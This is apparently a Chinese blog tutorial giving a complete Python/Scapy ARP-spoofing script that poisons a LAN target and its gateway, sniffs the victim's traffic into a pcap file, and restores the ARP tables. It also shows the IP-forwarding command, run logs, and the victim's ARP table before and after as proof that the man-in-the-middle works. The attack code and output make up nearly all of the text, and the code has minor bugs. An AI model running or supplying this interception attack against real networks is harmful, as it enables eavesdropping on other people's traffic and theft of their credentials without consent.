直接上实例,具体意思我都在源码上备注了
#-*-coding:utf-8-*-
from scapy.all import *
import os
import sys
import threading
import string
import signal
#需嗅探的本地网卡
interact = "eth0"
#目标攻击IP
target_ip = "192.168.2.245"
#网关IP
gatway_ip = "192.168.2.254"
packet_count = 1000
#嗅探的网卡
conf.iface = interact
#关闭输出
conf.verb = 0
def get_mac(ip_address):
responses,unanswered = srp(Ether(dst="01:02:03:04:05:06")/ARP(pdst=ip_address),timeout=2,retry=10)
for s,r in responses:
return r[Ether].src
return None
def restore_target(gatway_ip,gatway_mac,target_ip,target_mac):
print "[*] Restoring target..."
send(ARP(op=2,psrc=gatway_ip,pdst=gatway_ip,hwdst="01:02:03:04:05:06",hwsrc=gatway_mac),count=5)
send(ARP(op=2,psrc=gatway_ip,pdst=target_ip,hwdst="01:02:03:04:05:06",hwsrc=target_mac),count=5)
os.kill(os.getpid,sig=signal.SIGINT)
def poison_target(gatway_ip,gatway_mac,target_ip,target_mac):
poison_target = ARP()
poison_target.op =2
poison_target.psrc = gatway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gatewy = ARP()
poison_gatewy.op =2
poison_gatewy.psrc = target_ip
poison_gatewy.pdst = gatway_ip
poison_gatewy.hwdst = gatway_mac
print "[*] Beginning the ARP poison.[CTRL-C to stop]"
#循环不断发送ARP请求
while True:
try:
send(poison_target)
send(poison_gatewy)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gatway_ip, gatway_mac, target_ip, target_mac)
print "[*] ARP poison attack finised"
return
print "[*] Setting up %s" % interact
gatway_mac = get_mac(gatway_ip)
if gatway_mac is None:
print "[!!!] Faile to get gatway MAC.Exiting"
sys.exit(0)
else:
print "[*] Gatway %s is at %s" % (gatway_ip ,gatway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Faile to get target_mac MAC.Exiting"
sys.exit(0)
else:
print "[*] target_mac %s is at %s" % (target_ip ,target_mac)
#启动偷毒线程
poison_thread = threading.Thread(target=poison_target, args=(gatway_ip,gatway_mac,target_ip,target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
#bpf过滤器
#iface嗅探网卡
#count次数
packets = sniff(count=packet_count, filter=bpf_filter,iface=interact)
#讲铺货的输出到文件
wrpcap('arper.pcap',packets)
#还原网络配置
restore_target(gatway_ip,gatway_mac,target_ip,target_mac)
except KeyboardInterrupt:
restore_target(gatway_ip,gatway_mac,target_ip,target_mac)
exit(0)
这样我们就能欺骗客户端192.168.2.245的电脑认为我们的电脑是网关
本机开启流量转发
echo >1 /proc/sys/net/ipv4/ip_forward
未开启脚本之前,客户端arp -a查看
C:\Documents and Settings\Administrator>arp -a Interface: 192.168.2.245 --- 0x2 Internet Address Physical Address Type 192.168.2.254 00-30-18-1c-4b-29 dynamic 192.168.101.1 bc-5f-f6-a9-19-1d dynamic
开启软件
root@myspuerkali:~/python# python arper.py [*] Setting up eth0 [*] Gatway 192.168.2.254 is at 00:30:18:1c:4b:29 [*] target_mac 192.168.2.245 is at 00:0c:29:ca:e8:e0 [*] Beginning the ARP poison.[CTRL-C to stop] [*] Starting sniffer for 1000 packets
在查看客户机的ARP表
C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.2.245 --- 0x2
Internet Address Physical Address Type
192.168.2.88 d0-50-99-0a-e8-23 dynamic
192.168.2.249 00-50-56-2e-a2-d1 dynamic
192.168.2.254 00-50-56-2e-a2-d1 dynamic
192.168.101.1 bc-5f-f6-a9-19-1d dynamic
成功伪装成功,这样客户端上网的流量将会转发到我们这里
又因为我们添加了这段代码
wrpcap(‘arper.pcap’,packets)
所以成功之后我们可以看到在脚本目录生产了一个arper.pcap文件
可以使用wireshark跟network miner等工具处理跟打开。
下篇文章将会简单介绍怎么处理pcap文件包